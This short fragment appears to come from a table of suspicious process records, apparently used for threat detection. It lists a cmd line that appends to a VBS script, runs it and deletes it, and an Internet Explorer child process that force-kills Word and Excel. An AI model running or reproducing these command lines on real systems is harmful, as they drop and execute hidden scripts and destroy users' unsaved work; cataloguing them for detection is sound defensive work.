End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs | ||||||
parent_process | iexplore.exe | martian_process | cmd /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe |